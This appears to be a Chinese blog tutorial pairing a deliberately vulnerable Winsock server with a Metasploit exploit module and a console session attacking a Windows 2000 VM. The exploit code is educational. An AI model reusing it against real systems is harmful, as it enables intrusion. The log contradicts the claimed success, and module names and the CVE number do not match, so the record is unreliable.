简单测试使用msf发布poc

最新推荐文章于 2022-03-27 21:30:06 发布

iteye_10992

最新推荐文章于 2022-03-27 21:30:06 发布

阅读量607

点赞数

文章标签：网络运维 ruby

看个存在漏洞的代码

#include <IOSTREAM.H> #include <WINSOCK2.H> #pragma comment(lib,"ws2_32.lib") VOID msg_display(char *buf) { char msg[200]; strcpy(msg,buf); cout<<"****************"<<endl; cout<<msg<<endl; } void main() { SOCKET sock,msgsock,length,receive_len; struct sockaddr_in sock_server,sock_client; char buf[0x200]; WSADATA wsa; WSAStartup(MAKEWORD(1,1),&wsa); if ((sock=socket(AF_INET,SOCK_STREAM,0))<0) { cout<<sock<<"Socket Creating Error!"<<endl; exit(1); } sock_server.sin_family=AF_INET; sock_server.sin_port=htons(7777); sock_server.sin_addr.S_un.S_addr=INADDR_ANY; if (bind(sock,(sockaddr *)&sock_server,sizeof(sock_server))) { cout<<"binging stream socket error!"<<endl; } cout<<"**********************************"<<endl; cout<<" exploit target server 1.0 "<<endl; cout<<"**********************************"<<endl; listen(sock,4); length=sizeof(struct sockaddr); do { msgsock=accept(sock,(struct sockaddr *)&sock_client,(int *)&length); if (msgsock==1) { cout<<"accept error!"<<endl; break; } else do { memset(buf,0,sizeof(buf)); if ((receive_len=recv(msgsock,buf,sizeof(buf),0))<0) { cout<<"reading stream message error!"<<endl; receive_len=0; } msg_display(buf); }while(receive_len); closesocket(msgsock); } while (1); WSACleanup(); }msg_display中存在栈溢出，服务器测试环境windows2000 server虚拟机，让其运行监听7777端口。

看一个ruby脚本

#!/usr/bin/env ruby require 'msf/core' class Metasploit3 < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Evil0r_POC', 'Version' => '1.0', 'Platform' => 'win', 'Privileged' => true, 'License' => MSF_LICENSE, 'Author' => 'Evil0r', 'Targets' => [ ['Windows 2000', {'Ret' => [200 , 0x77F8948B] }], ['Windows XP SP2',{'Ret' => [200 , 0x7C914393] }], ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 200, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Description' => %q{ this module is exploit practice of book "Vulnerability Exploit and Analysis Technique" used only for educational purpose }, 'Arch' => 'x86', 'References' => [ [ 'URL', 'http://blog.csdn.net/evi10r' ], [ 'CVE', '44444' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process' } )) end #end of initialize def exploit connect print_status("Sending #{payload.encoded.length} byte payload...") buf = 'a'*target['Ret'][0] buf << [target['Ret'][1]].pack('V') buf <<payload.encoded; sock.put(buf) handler disconnect end #end of exploit def end将Evil0r_Poc.rb放到exploits目录下（新建一个文件夹），然后打开exploits console，show exploits就可以看到我们自己添加的模块了。

可以info看下信息

msf > info Evil0r/Evil0r_Poc

Name: Evil0r_POC
Version: 1.0
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
Evil0r

Available targets:
Id Name
-- ----
0 Windows 2000
1 Windows XP SP2

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT yes The target port

Payload information:
Space: 200
Avoid: 1 characters

Description:
this module is exploit practice of book "Vulnerability Exploit and
Analysis Technique" used only for educational purpose

References:
http://blog.csdn.net/evi10r
http://cve.mitre.org/cgi-bin/cvename.cgi?name=44444

现在我们拿它来对windows2000server虚拟机进行攻击测试。

msf > use failwest/est
[-] Failed to load module: failwest/est
msf > use failwest/test
msf exploit(test) > show targets

Exploit targets:

Id Name
-- ----
0 Windows 2000
1 Windows XP SP3

msf exploit(test) > set target 0
target => 0
msf exploit(test) > show payloads

Compatible Payloads
===================

Name Rank Description
---- ---- -----------
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/exec normal Windows Execute Command
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupvncinject/reverse_nonx_tcp normal Windows VNC Inject (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupvncinject/reverse_ord_tcp normal Windows VNC Inject (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)

msf exploit(test) > set payload windows/exec
payload => windows/exec
msf exploit(test) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT yes The target port

Payload options (windows/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
EXITFUNC process yes Exit technique: seh, thread, process

Exploit target:

Id Name
-- ----
0 Windows 2000

msf exploit(test) > set rhost 192.168.79.132
rhost => 192.168.79.132
msf exploit(test) > set rport 7777
rport => 7777
msf exploit(test) > set cmd calc
cmd => calc
msf exploit(test) > set exitfunc seh
exitfunc => seh
msf exploit(test) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.

然后看到我们的2000虚拟机弹出计算器窗口了，shellcode成功执行

iteye_10992

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
简单测试使用msf发布poc

看个存在漏洞的代码#include &lt;IOSTREAM.H&gt;#include &lt;WINSOCK2.H&gt;#pragma comment(lib,"ws2_32.lib")VOID msg_display(char *buf){ char msg[200]; strcpy(msg,buf); cout&lt;&lt;"*************...
复制链接

扫一扫